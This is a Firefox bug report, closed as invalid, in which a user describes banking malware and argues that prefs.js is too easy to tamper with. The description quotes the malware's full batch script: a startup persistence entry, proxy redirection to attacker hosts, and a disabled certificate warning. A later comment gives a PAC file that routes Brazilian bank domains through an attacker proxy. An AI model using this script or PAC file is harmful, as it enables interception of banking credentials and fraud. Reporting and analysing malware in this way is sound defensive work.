
Firefox is a virus target

RESOLVED INVALID

Status: RESOLVED INVALID
Product: Firefox
Component: Security
Priority: --
Severity: major
Reported: 8 years ago
Modified: 8 years ago

People

(Reporter: Renato S. Yamane, Unassigned)

Tracking

Version: 3.5 Branch
Platform: x86 Windows XP
Points: ---

Firefox Tracking Flags

(Not tracked)

Details

Attachments

(3 attachments)

(Reporter)

Description

8 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)

I have checked that Firefox is a virus target.
The virus changes the proxy settings to redirect all connections to an external proxy, capturing all banking information:

@shift
::@echo off
@break off

if exist %temp%\iecfg.dll goto con
::add to regedit
> %temp%\iecfg.dll echo y
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v JavaPlugin /t REG_SZ /d "%temp%\csrrs.exe" < %temp%\iecfg.dll
start /low /min iexplore.exe "http://adobe.shockwavesfx.com/successful.php"
goto mapa
::Connection test
:con
set ping=%windir%\system32\ping.exe
:test
%ping% 74.125.159.99 -n 1 -l 1 | find "TTL" > nul
if not errorlevel 1 goto mapa
goto teste
:mapa
::Get IP
FOR /F "TOKENS=3 delims=: " %%E IN ('%windir%\system32\ping.exe proxy.shockwavesfx.com -n 1 -l 1 ^| find.exe "TTL" ') DO SET ip=%%E



FOR /F "TOKENS=*" %%E IN ('dir "%HoMePath%\.." /b /s ^| find "prefs.js"') DO %windir%\system32\attrib.exe -r -a -s -h "%%E" && echo user_pref("network.proxy.autoconfig_url", "http://%ip%/proxy.pac"); >> "%%E"
FOR /F "TOKENS=*" %%E IN ('dir "%HoMePath%\.." /b /s ^| find "prefs.js"') DO %windir%\system32\attrib.exe -r -a -s -h "%%E" && echo user_pref("network.proxy.type", 2); >> "%%E"



type %temp%\~a.tmp | find.exe "Internet Explorer\Main">%temp%\~b.tmp && for /f "tokens=2 delims=\" %%D in ('type %temp%\~b.tmp ^| find.exe "S-1-5-21"') do set CSL=%%D
echo y|%windir%\system32\reg.exe add "HKU\%CSL%\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnonBadCertRecving" /t REG_DWORD /d "0x00000000" /f


cd %HoMePath%
::Add Proxy to IE*
echo Windows Registry Editor Version 5.00 > iecfg.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings] >> iecfg.reg
echo "AutoConfigURL"="http://%ip%/proxy.pac" >> iecfg.reg
echo "EnableHttp1_1"=dword:00000001 >> iecfg.reg
echo "ProxyEnable"=dword:00000000 >> iecfg.reg
echo "ProxyHttp1.1"=dword:00000000 >> iecfg.reg
regedit /s iecfg.reg
del iecfg.reg


::Allow java applet
cd %windir%
cd ..
FOR /F "TOKENS=*" %%E IN ('dir /b /s ^| find /i "java.policy"') DO echo grant {  permission java.security.AllPermission;}; > "%%E"
:no

::exit

Reproducible: Always

Actual Results:  
prefs.js is very easy to change by an external action.

Expected Results:  
When prefs.js has been changed, the user needs to be informed when Firefox runs.
(Reporter)

Updated

8 years ago
Component: General → Security
Version: unspecified → 3.5 Branch
(Reporter)

Comment 1

8 years ago
http://securityproxy1.no-ip.biz/proxy.pac has this content (I have already told no-ip to block this address):

=============================================
function FindProxyForURL(url, host) {

var n = new Array("www.bradesco.com.br","bradesco.com.br","bradesco.com",

"www.cef.com.br","cef.com.br","www.caixa.com.br","caixa.com.br","www.cef.gov.br","cef.gov.br","www.caixaeconomica.com.br","caixaeconomica.com.br","www.caixaeconomicafederal.com.br","caixaeconomicafederal.com.br","www.caixa.gov.br","caixa.gov.br","www.itau.com.br","itau.com.br","www.real.com.br","real.com.br","www.bancoreal.com.br","bancoreal.com.br","www.bb.com.br","bb.com.br","www.bancodobrasil.com.br","bancodobrasil.com.br","www.bancobrasil.com.br","bancobrasil.com.br","www.santander.com.br","santander.com.br","www.banespa.com.br","banespa.com.br","www.santanderbanespa.com.br","santanderbanespa.com.br","www.itaupersonnalite.com.br","itaupersonnalite.com.br","www.itauprivatebank.com.br","itauprivatebank.com.br","www.unibanco.com.br","unibanco.com.br");

for(var i =0;i<n.length;i++) { if (shExpMatch(host, n[i])) {

return "PROXY 72.20.10.175:80"; } }

return "DIRECT"; }
=============================================

All these sites are Brazilian banks.
(Reporter)

Comment 2

8 years ago
The virus changed...

- From csrrs.exe to iexplorer.exe
- From batch file (.bat) to executable file (.exe).
- And now, proxy is http://proxy.shockwavesfxlive.in/proxy.pac

I will attach iexplorer.exe, iexplorer.dll and finder.exe.

All these files are placed in:
C:\Documents and Settings\USER\Local Settings\Temp
(Reporter)

Comment 3

8 years ago
Created attachment 390144 [details]
executable file (checked in msconfig that it is loaded at every startup)
(Reporter)

Comment 4

8 years ago
Created attachment 390145 [details]
I don't know what it does, but it is a piece of this virus.
(Reporter)

Comment 5

8 years ago
Created attachment 390146 [details]
This file looks for prefs.js to change the proxy settings.
(Reporter)

Comment 6

8 years ago
Can someone confirm this problem?
It is not comfortable to have all bank account traffic redirected to an external proxy.

Comment 7

8 years ago
Being the target of a virus isn't a security hole. But maybe dveditz can tell you what he knows about this virus.
Group: core-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 8 years ago
Resolution: --- → INVALID
(Reporter)

Comment 8

8 years ago
Jesse, I agree that "being the target of a virus isn't a security hole", *but* this kind of worm shows us that it is VERY EASY to change important parameters in Firefox.

A simple batch file can do:
echo user_pref("network.proxy.autoconfig_url", "proxy.pac"); >> prefs.js

I think that a text file (prefs.js) can't be used for important things!

Any script kiddie can edit this kind of file easily.

Comment 9

8 years ago
Obfuscating configuration files is not a very strong security measure.
(Reporter)

Comment 10

8 years ago
But a txt file (such as prefs.js) can be edited by any *KID*.
This is trivial!

A lot of other worms will appear using a simple "echo" to edit Firefox config files.

Redirecting the traffic of financial institutions (as this worm does) is very dangerous to Firefox users.

Comment 11

8 years ago
Getting access to your computer is a much higher bar than editing a text file or a binary blob.
(Reporter)

Comment 12

8 years ago
Think with me:

- A user receives a batch file ("click here to see Britney Spears nude").
- This file edits prefs.js using "echo", enabling the proxy.
- All financial institution data will be redirected to an external proxy.
- The cracker will get your account number, credit card information, etc.

This kind of worm (batch file) will never be caught by anti-virus.

I know that the user must not click on anything, but we know that users will do that!

And IMHO Firefox needs to avoid this kind of situation.